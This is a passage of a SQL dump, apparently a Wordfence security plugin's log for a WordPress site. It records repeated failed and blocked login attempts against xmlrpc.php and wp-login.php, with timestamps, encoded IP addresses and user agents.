Firefox/62.0','loginFailValidUsername',NULL,NULL),(6866,0.000000,1629580362.443814,'\0\0\0\0\0\0\0\0\0\0��D��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36','loginFailValidUsername',NULL,NULL),(6867,0.000000,1629580615.350773,'\0\0\0\0\0\0\0\0\0\0���˰R',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6868,0.000000,1629580930.433900,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6869,0.000000,1629581247.180552,'\0\0\0\0\0\0\0\0\0\0��\r�>',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6870,0.000000,1629581562.130845,'\0\0\0\0\0\0\0\0\0\0��Ǽ��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6871,0.000000,1629581894.043456,'\0\0\0\0\0\0\0\0\0\0����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6872,0.000000,1629582221.007320,'\0\0\0\0\0\0\0\0\0\0��]qod',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6873,0.000000,1629582511.337109,'\0\0\0\0\0\0\0\0\0\0��=o�$',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6874,0.000000,1629582756.359296,'\0\0\0\0\0\0\0\0\0\0����p�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6875,0.000000,1629582870.418965,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6876,0.000000,1629583200.142724,'\0\0\0\0\0\0\0\0\0\0��Oe,',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6877,0.000000,1629583509.495773,'\0\0\0\0\0\0\0\0\0\0���#��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6878,0.000000,1629583847.373829,'\0\0\0\0\0\0\0\0\0\0�����',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6879,0.000000,1629583953.910675,'\0\0\0\0\0\0\0\0\0\0��Ո]�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','loginFailValidUsername',NULL,NULL),(6880,0.000000,1629584139.598610,'\0\0\0\0\0\0\0\0\0\0���;=�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6881,0.000000,1629584477.833910,'\0\0\0\0\0\0\0\0\0\0��j)�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6882,0.000000,1629584845.006145,'\0\0\0\0\0\0\0\0\0\0����%+',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6883,0.000000,1629585175.134623,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6884,0.000000,1629585495.349917,'\0\0\0\0\0\0\0\0\0\0��.ePS',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6885,0.000000,1629585884.081250,'\0\0\0\0\0\0\0\0\0\0��g��R',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6886,0.000000,1629586240.599308,'\0\0\0\0\0\0\0\0\0\0��P��o',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6887,0.000000,1629586339.322412,'\0\0\0\0\0\0\0\0\0\0��`}��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6888,0.000000,1629586583.101837,'\0\0\0\0\0\0\0\0\0\0���q٤',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6889,0.000000,1629586896.921391,'\0\0\0\0\0\0\0\0\0\0���@u�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6890,0.000000,1629587288.146026,'\0\0\0\0\0\0\0\0\0\0���q٤',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6891,0.000000,1629587536.005299,'\0\0\0\0\0\0\0\0\0\0���;v�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36','loginFailValidUsername',NULL,NULL),(6892,0.000000,1629587600.902100,'\0\0\0\0\0\0\0\0\0\0���@sP',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6893,0.000000,1629587984.497440,'\0\0\0\0\0\0\0\0\0\0���1N',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6894,0.000000,1629588340.631662,'\0\0\0\0\0\0\0\0\0\0���c\no',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6895,0.000000,1629588676.616901,'\0\0\0\0\0\0\0\0\0\0���.yB',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6896,0.000000,1629588737.336165,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(6897,0.000000,1629589084.796347,'\0\0\0\0\0\0\0\0\0\0����K�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6898,0.000000,1629589400.652210,'\0\0\0\0\0\0\0\0\0\0����`�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6899,0.000000,1629589771.805673,'\0\0\0\0\0\0\0\0\0\0����9�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6900,0.000000,1629589937.361716,'\0\0\0\0\0\0\0\0\0\0���,',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6901,0.000000,1629590102.466458,'\0\0\0\0\0\0\0\0\0\0��C͘',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6902,0.000000,1629590496.407326,'\0\0\0\0\0\0\0\0\0\0��g�y�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6903,0.000000,1629590869.033637,'\0\0\0\0\0\0\0\0\0\0����f�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6904,0.000000,1629591136.890788,'\0\0\0\0\0\0\0\0\0\0���aD�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','loginFailValidUsername',NULL,NULL),(6905,0.000000,1629591235.870849,'\0\0\0\0\0\0\0\0\0\0���[h�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6906,0.000000,1629592337.803480,'\0\0\0\0\0\0\0\0\0\0��#��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','loginFailValidUsername',NULL,NULL),(6907,0.000000,1629592623.096270,'\0\0\0\0\0\0\0\0\0\0���@u�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6908,0.000000,1629593006.576766,'\0\0\0\0\0\0\0\0\0\0��n��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6909,0.000000,1629593401.691140,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6910,0.000000,1629593529.820235,'\0\0\0\0\0\0\0\0\0\0��/sM�',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6911,0.000000,1629593780.231726,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6912,0.000000,1629594169.929226,'\0\0\0\0\0\0\0\0\0\0��-P�0',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6913,0.000000,1629594523.194932,'\0\0\0\0\0\0\0\0\0\0��H�%�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6914,0.000000,1629594725.997799,'\0\0\0\0\0\0\0\0\0\0��:��^',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','loginFailValidUsername',NULL,NULL),(6915,0.000000,1629594903.503020,'\0\0\0\0\0\0\0\0\0\0���?',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6916,0.000000,1629595301.055740,'\0\0\0\0\0\0\0\0\0\0���l��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6917,0.000000,1629595672.837160,'\0\0\0\0\0\0\0\0\0\0��.e�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6918,0.000000,1629595918.602344,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36','loginFailValidUsername',NULL,NULL),(6919,0.000000,1629596028.819052,'\0\0\0\0\0\0\0\0\0\0����A',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6920,0.000000,1629596446.942671,'\0\0\0\0\0\0\0\0\0\0��w4�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6921,0.000000,1629596832.417027,'\0\0\0\0\0\0\0\0\0\0���Ů�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6922,0.000000,1629597107.417507,'\0\0\0\0\0\0\0\0\0\0���;�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','loginFailValidUsername',NULL,NULL),(6923,0.000000,1629597221.177245,'\0\0\0\0\0\0\0\0\0\0��g��',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6924,0.000000,1629597580.851930,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6925,0.000000,1629597976.487016,'\0\0\0\0\0\0\0\0\0\0���3',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6926,0.000000,1629598302.016482,'\0\0\0\0\0\0\0\0\0\0��(z��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6927,0.000000,1629598345.163848,'\0\0\0\0\0\0\0\0\0\0��@�N�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6928,0.000000,1629598772.686273,'\0\0\0\0\0\0\0\0\0\0��m�\Z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6929,0.000000,1629599174.734461,'\0\0\0\0\0\0\0\0\0\0��g�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6930,0.000000,1629599501.926795,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6931,0.000000,1629599573.561906,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6932,0.000000,1629599983.346572,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6933,0.000000,1629600347.400534,'\0\0\0\0\0\0\0\0\0\0��`}��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6934,0.000000,1629600693.943546,'\0\0\0\0\0\0\0\0\0\0��T��',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','loginFailValidUsername',NULL,NULL),(6935,0.000000,1629600769.702893,'\0\0\0\0\0\0\0\0\0\0�����]',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6936,0.000000,1629601174.402141,'\0\0\0\0\0\0\0\0\0\0���a��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6937,0.000000,1629601628.229337,'\0\0\0\0\0\0\0\0\0\0���@t�',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6938,0.000000,1629601899.723165,'\0\0\0\0\0\0\0\0\0\0��C��',0,503,0,0,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6939,0.000000,1629601968.250655,'\0\0\0\0\0\0\0\0\0\0��gZ�j',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6940,0.000000,1629602256.567234,'\0\0\0\0\0\0\0\0\0\0��h�O�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; QQDownload 1.7; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)','loginFailValidUsername',NULL,NULL),(6941,0.000000,1629602770.310032,'\0\0\0\0\0\0\0\0\0\0����v�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6942,0.000000,1629603104.716731,'\0\0\0\0\0\0\0\0\0\0���#�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36','loginFailValidUsername',NULL,NULL),(6943,0.000000,1629603151.145219,'\0\0\0\0\0\0\0\0\0\0��=o�$',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6944,0.000000,1629603589.600997,'\0\0\0\0\0\0\0\0\0\0��X�$�',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6945,0.000000,1629603959.412397,'\0\0\0\0\0\0\0\0\0\0���@wP',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6946,0.000000,1629604303.106130,'\0\0\0\0\0\0\0\0\0\0��/� ',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(6947,0.000000,1629604342.908314,'\0\0\0\0\0\0\0\0\0\0��>�zJ',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6948,0.000000,1629604343.409058,'\0\0\0\0\0\0\0\0\0\0��>�zJ',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6949,0.000000,1629604343.882457,'\0\0\0\0\0\0\0\0\0\0��>�zJ',0,200,0,0,0,'https://www.equalitywalk.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36','loginFailInvalidUsername',NULL,NULL),(6950,0.000000,1629604389.041056,'\0\0\0\0\0\0\0\0\0\0��h+�5',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6951,0.000000,1629604785.286437,'\0\0\0\0\0\0\0\0\0\0��m�\Z',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6952,0.000000,1629604838.612684,'\0\0\0\0\0\0\0\0\0\0��\"W#�',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36','loginFailValidUsername',NULL,NULL),(6953,0.000000,1629605100.815564,'\0\0\0\0\0\0\0\0\0\0����kQ',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6954,0.000000,1629605402.547059,'\0\0\0\0\0\0\0\0\0\0��C͘',0,503,0,0,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(6955,0.000000,1629605699.053313,'\0\0\0\0\0\0\0\0\0\0��k��2',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6956,0.000000,1629605930.162007,'\0\0\0\0\0\0\0\0\0\0������',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6957,0.000000,1629606006.079443,'\0\0\0\0\0\0\0\0\0\0��3',0,200,0,1,0,'https://equalitywalk.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','loginFailValidUsername',NULL,NULL),(6958,0.000000,1629606174.884180,'\0\0\0\0\0\0\0\0\0\0��w��',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(6959,0.000000,1629606434.802304,'\0\0\0\0\0\0\0\0\0\0��N��4',0,200,0,1,0,'https://equalitywalk.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 